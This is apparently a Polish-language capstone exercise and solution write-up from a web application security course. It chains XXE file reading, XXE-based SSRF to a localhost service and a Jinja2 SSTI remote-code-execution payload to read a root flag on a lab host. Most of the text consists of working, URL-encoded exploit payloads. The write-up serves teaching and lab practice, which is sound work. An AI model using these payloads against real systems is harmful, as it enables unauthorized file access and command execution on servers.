# Zadanie podsumowujące zaawansowany kurs bezpieczeństwa aplikacji webowych
Twoim celem jest odczytanie treści flagi znajdującej się w pliku /root/root.txt. W tym celu przejdź do strony:
```sh
http://vuln.vms.perkmylife.com:8081/
```
i spróbuj wykorzystać zgromadzoną wiedzę z tego kursu.

Poniżej rozwiązanie:
Na stronie znajduje się formularz, który zdaje się wysyłać wiadomość do administratora. Przyglądając się dalej można zauważyć komentarz w kodzie źródłowym głównej strony:
```html
<!-- Hi, to send me prettier data, use XML tags <root><name>data</name></data>, oh and kill webapp on port 100 --!>
```
Mamy więc informację o możliwości przesyłu danych XML oraz budowę tych danych oraz o aplikacji na porcie 100. Spróbujmy wysłać dane testowe np.
Sprawdźmy czy faktycznie jakaś aplikacja jest uruchomiona:
```sh
http://vuln.vms.perkmylife.com:100/
```
Nie działa, albo jakaś aplikacja jest zabita, albo chodzi na localhoście.
```html
<root><name>Test data!</name></root>
```
Działa! To oznacza, że dane są wyświetlane z zawartości tagów <name></name>. Teraz spróbujmy wykorzystać encję do zewnętrznego pliku, żeby sprawdzić czy możemy korzystać z encji.
```html
<!DOCTYPE root [
<!ENTITY xxe SYSTEM "/etc/passwd">
]>
<root>
    <name>&xxe;</name>
</root>
```
Działa! Jeżeli spróbujemy wyświetlić plik /root/root.txt

//src/vuln/advanced_exercise_summary/exploits/xml_exploit.xml
```html
<!DOCTYPE root [
<!ENTITY xxe SYSTEM "/root/root.txt">
]>
<root>
    <name>&xxe;</name>
</root>
```
Nic się nie wyświetli. Prawdopodobnie z racji tego, że jesteśmy użytkownikiem do obsługi strony, a nie rootem. Normalnie należałoby podnieść uprawnienia, ale póki co nie mamy powłoki.
Możemy czytać pliki, ale też spróbować poszukać innych serwerów, które nie są dostępną publiczne, bo np. stoją na pętli zwrotnej.
Mając na uwadze komentarz dewelopera o porcie 100, spróbujmy wejść na aplikacje z poziomu localhosta.
```html
<!DOCTYPE root [
<!ENTITY xxe SYSTEM "http://127.0.0.1:100">
]>
<root>
    <name>&xxe;</name>
</root>
```
Działa!
Teraz kiedy znamy port dostajemy komunikat:
```html
Hi, guest Can you find flag?
```
Wygląda na to, że ciasteczko albo jakiś parametr URL odpowiadają za wyświetlanie nazwy "guest", albo jest to nazwa stała. Sprawdźmy czy bardzo często używany parametr name coś zmieni:
```html
<!DOCTYPE root [
<!ENTITY xxe SYSTEM "http://127.0.0.1:100?name=test">
]>
<root>
    <name>&xxe;</name>
</root>
```
Działa! Wygląda na to, że być może strona używa silników szablonów sprawdźmy czy któryś z tych payloadów działa.
```haskell
{{7*7}}
${7*7}
```
Należy pamiętać o zakodowaniu ich w URL przed wysłaniem ze względu na to, że mogą zniszczyć składnie XMLa. 
```html
<!DOCTYPE root [
<!ENTITY xxe SYSTEM "http://127.0.0.1:100?name=%7B%7B7%2A7%7D%7D">
]>
<root>
    <name>&xxe;</name>
</root>
```
Jak się okazuje {{7*7}} działa świetnie. Spróbujmy wobec tego spróbować wykonać RCE na aplikacje na FLASK ze względu na to, że to bardzo często używany framework. Jeżeli taki exploit nie zadziałałby,
można byłoby spróbować skorzystać z innych exploitów pod inne silniki szablonów.

//src/vuln/advanced_exercise_summary/exploits/ssti_exploit.html
```html
{% for c in [].__class__.__base__.__subclasses__() %}
{% if c.__name__ == 'catch_warnings' %}
  {% for b in c.__init__.__globals__.values() %}
  {% if b.__class__ == {}.__class__ %}
    {% if 'eval' in b.keys() %}
      {{ b['eval']('__import__("os").popen("id").read()') }}
    {% endif %}
  {% endif %}
  {% endfor %}
{% endif %}
{% endfor %}
```
Z poprzedniej części kursu wiemy jak stworzyć kod RCE SSTI, który wyświetla wynik komendy "id". Teraz taki kod należy zakodować w URL i podać jako parametr name w XXE.
```haskell
%7B%25%20for%20c%20in%20%5B%5D.__class__.__base__.__subclasses__%28%29%20%25%7D%0A%7B%25%20if%20c.__name__%20%3D%3D%20%27catch_warnings%27%20%25%7D%0A%20%20%7B%25%20for%20b%20in%20c.__init__.__globals__.values%28%29%20%25%7D%0A%20%20%7B%25%20if%20b.__class__%20%3D%3D%20%7B%7D.__class__%20%25%7D%0A%20%20%20%20%7B%25%20if%20%27eval%27%20in%20b.keys%28%29%20%25%7D%0A%20%20%20%20%20%20%7B%7B%20b%5B%27eval%27%5D%28%27__import__%28%22os%22%29.popen%28%22id%22%29.read%28%29%27%29%20%7D%7D%0A%20%20%20%20%7B%25%20endif%20%25%7D%0A%20%20%7B%25%20endif%20%25%7D%0A%20%20%7B%25%20endfor%20%25%7D%0A%7B%25%20endif%20%25%7D%0A%7B%25%20endfor%20%25%7D
```
i w XML:
```html
<!DOCTYPE root [
<!ENTITY xxe SYSTEM "http://127.0.0.1:100?name=%7B%25%20for%20c%20in%20%5B%5D.__class__.__base__.__subclasses__%28%29%20%25%7D%0A%7B%25%20if%20c.__name__%20%3D%3D%20%27catch_warnings%27%20%25%7D%0A%20%20%7B%25%20for%20b%20in%20c.__init__.__globals__.values%28%29%20%25%7D%0A%20%20%7B%25%20if%20b.__class__%20%3D%3D%20%7B%7D.__class__%20%25%7D%0A%20%20%20%20%7B%25%20if%20%27eval%27%20in%20b.keys%28%29%20%25%7D%0A%20%20%20%20%20%20%7B%7B%20b%5B%27eval%27%5D%28%27__import__%28%22os%22%29.popen%28%22id%22%29.read%28%29%27%29%20%7D%7D%0A%20%20%20%20%7B%25%20endif%20%25%7D%0A%20%20%7B%25%20endif%20%25%7D%0A%20%20%7B%25%20endfor%20%25%7D%0A%7B%25%20endif%20%25%7D%0A%7B%25%20endfor%20%25%7D">
]>
<root>
    <name>&xxe;</name>
</root>
```
Kod działa świetnie. Dodatkowo okazało się, że aplikacja jest uruchomiona jako root. Spróbujmy teraz zmienić polecenie "id" na "cat /root/root.txt"
```html
{% for c in [].__class__.__base__.__subclasses__() %}
{% if c.__name__ == 'catch_warnings' %}
  {% for b in c.__init__.__globals__.values() %}
  {% if b.__class__ == {}.__class__ %}
    {% if 'eval' in b.keys() %}
      {{ b['eval']('__import__("os").popen("cat /root/root.txt").read()') }}
    {% endif %}
  {% endif %}
  {% endfor %}
{% endif %}
{% endfor %}
```
Teraz kodowanie URL
```
%7B%25%20for%20c%20in%20%5B%5D.__class__.__base__.__subclasses__%28%29%20%25%7D%0A%7B%25%20if%20c.__name__%20%3D%3D%20%27catch_warnings%27%20%25%7D%0A%20%20%7B%25%20for%20b%20in%20c.__init__.__globals__.values%28%29%20%25%7D%0A%20%20%7B%25%20if%20b.__class__%20%3D%3D%20%7B%7D.__class__%20%25%7D%0A%20%20%20%20%7B%25%20if%20%27eval%27%20in%20b.keys%28%29%20%25%7D%0A%20%20%20%20%20%20%7B%7B%20b%5B%27eval%27%5D%28%27__import__%28%22os%22%29.popen%28%22cat%20%2Froot%2Froot.txt%22%29.read%28%29%27%29%20%7D%7D%0A%20%20%20%20%7B%25%20endif%20%25%7D%0A%20%20%7B%25%20endif%20%25%7D%0A%20%20%7B%25%20endfor%20%25%7D%0A%7B%25%20endif%20%25%7D%0A%7B%25%20endfor%20%25%7D
```
I wklejenie gotowego exploita SSTI to XXE
```html
<!DOCTYPE root [
<!ENTITY xxe SYSTEM "http://127.0.0.1:100?name=%7B%25%20for%20c%20in%20%5B%5D.__class__.__base__.__subclasses__%28%29%20%25%7D%0A%7B%25%20if%20c.__name__%20%3D%3D%20%27catch_warnings%27%20%25%7D%0A%20%20%7B%25%20for%20b%20in%20c.__init__.__globals__.values%28%29%20%25%7D%0A%20%20%7B%25%20if%20b.__class__%20%3D%3D%20%7B%7D.__class__%20%25%7D%0A%20%20%20%20%7B%25%20if%20%27eval%27%20in%20b.keys%28%29%20%25%7D%0A%20%20%20%20%20%20%7B%7B%20b%5B%27eval%27%5D%28%27__import__%28%22os%22%29.popen%28%22cat%20%2Froot%2Froot.txt%22%29.read%28%29%27%29%20%7D%7D%0A%20%20%20%20%7B%25%20endif%20%25%7D%0A%20%20%7B%25%20endif%20%25%7D%0A%20%20%7B%25%20endfor%20%25%7D%0A%7B%25%20endif%20%25%7D%0A%7B%25%20endfor%20%25%7D">
]>
<root>
    <name>&xxe;</name>
</root>
```
I gotowe! To już koniec zadania. Wykorzystaliśmy tutaj aż trzy luki - XXE umożliwiające SSRF i SSTI na serwerze lokalnym maszyny. Bardzo często zdarza się, że atakujący znajdują kilka błędów, które po połączeniu w całość pozwalają bardzo niebezpieczne działania.
